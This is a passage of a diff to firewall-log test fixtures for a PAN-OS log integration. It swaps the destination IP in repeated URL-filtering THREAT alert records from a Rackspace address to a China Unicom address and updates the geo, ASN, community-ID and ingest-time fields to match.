"alert", @@ -3312,26 +3292,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -3347,7 +3326,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -3389,7 +3368,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:/+Opb16c1ye6uLeu1/TNC+SGnYs=", + "community_id": "1:6PzwuKfF+39cTFyZytdFAhD4w44=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -3426,14 +3405,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545493261Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079121900Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -3456,26 +3435,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -3491,7 +3469,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -3533,7 +3511,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:uslltTePy/m8Gxhk/MgPbZfk6Rg=", + "community_id": "1:vRVo2Gp1oNRBcvj5NtWtblslqFk=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -3570,14 +3548,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545504361Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079127Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -3600,26 +3578,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -3635,7 +3612,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -3677,7 +3654,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:WiUImNtgjkeNDi1Qigg7+Y6pDAg=", + "community_id": "1:06OCvk6jDtgpNZu7X72+H8dLeQ8=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -3714,14 +3691,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545512097Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079134700Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -3744,26 +3721,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -3779,7 +3755,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -3821,7 +3797,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:FmIwID3HJ4Q0574SjlhMHApz/Hs=", + "community_id": "1:zCXr7ZHueb4XQvihT/RtgRKe8VI=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -3858,14 +3834,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545519286Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079138700Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -3888,26 +3864,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -3923,7 +3898,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -3965,7 +3940,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:6AuZBrHKsUJjLNgm/mJ5QToaPo8=", + "community_id": "1:1lzsBSPnoPJeEUEveEgV+jZ1xOA=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -4002,14 +3977,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545526614Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079143600Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -4032,26 +4007,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -4067,7 +4041,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -4109,7 +4083,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:NwAT+gtzMjRwKS71Tn+YaKwyOvI=", + "community_id": "1:SXzPelGxF8TuDIbRbwKvR0ebxPA=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -4146,14 +4120,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545533728Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079170300Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -4176,26 +4150,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -4211,7 +4184,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -4253,7 +4226,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:mTTbk9h6Dgx6lH3l4aEHguufZVE=", + "community_id": "1:susDkHpBXaMVE4YOqEBbFKp9r00=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -4290,14 +4263,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545540823Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079175300Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -4320,26 +4293,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -4355,7 +4327,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -4397,7 +4369,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:/0xM0KlMLwieymkDApfqS3/WWiQ=", + "community_id": "1:iXmhRxdINxEmOXTjxHfTv8gVn1o=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -4434,14 +4406,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545547868Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079181100Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -4464,26 +4436,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -4499,7 +4470,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -4541,7 +4512,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:VLKKVfau50s2qjTDcucU+VKCAqY=", + "community_id": "1:B6oxpQQYa0rsyW55IuJO81SLmqQ=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -4578,14 +4549,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545555073Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079187Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -4608,26 +4579,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -4643,7 +4613,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -4685,7 +4655,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:jAvA0C85T0GFKryKA312lLEtKIM=", + "community_id": "1:i77fJfEDsnltkr5Ib1/ISaydfdg=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
